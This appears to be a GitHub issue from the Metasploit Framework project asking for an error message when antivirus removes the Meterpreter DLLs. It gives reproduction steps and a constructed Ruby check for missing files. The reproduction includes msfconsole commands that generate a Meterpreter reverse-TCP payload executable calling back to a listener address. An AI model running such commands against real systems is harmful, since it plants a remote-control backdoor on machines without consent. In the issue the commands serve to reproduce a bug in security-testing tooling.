rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Add error message if Meterpreter DLLs are missing #16473

Closed adfoster-r7 closed 12 months ago

adfoster-r7 commented 2 years ago

Summary

When Antivirus deletes the Meterpreter DLLs, there's no clear indication that something has gone wrong. We could improve this by:

Generate payload:

use windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.159 
generate -f exe -o shell.exe

Move the DLLS:

## Find where your DLLs are currently:
msf6 payload(windows/x64/meterpreter/reverse_tcp) > bundle show metasploit-payloads
[*] exec: bundle show metasploit-payloads
/Users/user/.rvm/gems/ruby-3.0.5@metasploit-framework/gems/metasploit-payloads-2.0.148

## Temporarily move them!
cd /opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/metasploit-payloads-2.0.148/data
sudo mv meterpreter/ removed_by_av_meterpreter/

Verifying nil path in msfconsole:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > irb
[*] Starting IRB shell...
[*] You are in payload/windows/x64/meterpreter/reverse_tcp

>>  MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: false)
=> nil

Now trigger the payload on the windows target

Current behavior

The prompt does not indicate any failure has occurred:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

Expected behavior

Expected behavior:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
[!] Meterpreter path metsrv.x86.dll not found. Ensure antivirus is not enabled, or reinstall Metasploit.

Motivation

Allow users to more clearly understand when their A/V is interrupting msfconsole usage

Debugging

Not sure where the code is being called from, but you should be able to put in a breakpoint and use puts caller or up and down inside an interactive pry breakpoint to work out what's what

msf6 payload(windows/x64/meterpreter/reverse_tcp) > irb
[*] Starting IRB shell...
[*] You are in payload/windows/x64/meterpreter/reverse_tcp

>> MetasploitPayloads.method(:meterpreter_path)
=> #<Method: MetasploitPayloads.meterpreter_path(name, binary_suffix, debug: ...) /Users/user/.rvm/gems/ruby-3.0.5@metasploit-framework/gems/metasploit-payloads-2.0.148/lib/metasploit-payloads.rb:40>
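An added example, not code from this issue or from Metasploit itself, showing the check the issue asks for: resolve each DLL the way `MetasploitPayloads.meterpreter_path` does (stood in for here by a local lookup over a constructed temporary directory, with a constructed list of DLL names) and produce the proposed warning line for every file that is no longer on disk.

```ruby
# Added example (not Metasploit's own code): verify that the Meterpreter DLLs a
# handler depends on are still present, and build the warning the issue asks
# for when one is missing. The directory layout and the DLL list are
# constructed here; the real lookup is MetasploitPayloads.meterpreter_path.
require 'tmpdir'
require 'fileutils'

# Constructed sample of [name, suffix] pairs, not the gem's real list.
REQUIRED_DLLS = [
  ['metsrv', 'x86.dll'],
  ['metsrv', 'x64.dll'],
  ['ext_server_stdapi', 'x64.dll']
].freeze

# Stand-in with the same shape as MetasploitPayloads.meterpreter_path(name, suffix):
# returns the full path when the file is readable, otherwise nil (as in the issue).
def meterpreter_path(data_dir, name, suffix)
  path = File.join(data_dir, 'meterpreter', "#{name}.#{suffix}")
  File.readable?(path) ? path : nil
end

# Returns one warning string per missing DLL; empty array when all are present.
def missing_dll_warnings(data_dir)
  REQUIRED_DLLS.filter_map do |name, suffix|
    next if meterpreter_path(data_dir, name, suffix)

    "[!] Meterpreter path #{name}.#{suffix} not found. " \
      'Ensure antivirus is not enabled, or reinstall Metasploit.'
  end
end

# Build a throwaway data directory and remove one DLL, mirroring the `mv`
# step in the issue's reproduction, then run the check against it.
def simulate_av_removal
  Dir.mktmpdir do |dir|
    FileUtils.mkdir_p(File.join(dir, 'meterpreter'))
    REQUIRED_DLLS.each do |name, suffix|
      FileUtils.touch(File.join(dir, 'meterpreter', "#{name}.#{suffix}"))
    end
    File.delete(File.join(dir, 'meterpreter', 'metsrv.x86.dll'))
    missing_dll_warnings(dir)
  end
end

puts simulate_av_removal if $PROGRAM_NAME == __FILE__
```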

smcintyre-r7 commented 2 years ago

Kind of unrelated but we have something similar to this here where the EICAR string is used as a canary to see if the files have been tampered with.

https://github.com/rapid7/metasploit-framework/blob/42c94fee8103394a4ab33f54cb354858422cc6aa/lib/msf/core/framework.rb#L243

adfoster-r7 commented 12 months ago

Closed by https://github.com/rapid7/metasploit-payloads/pull/673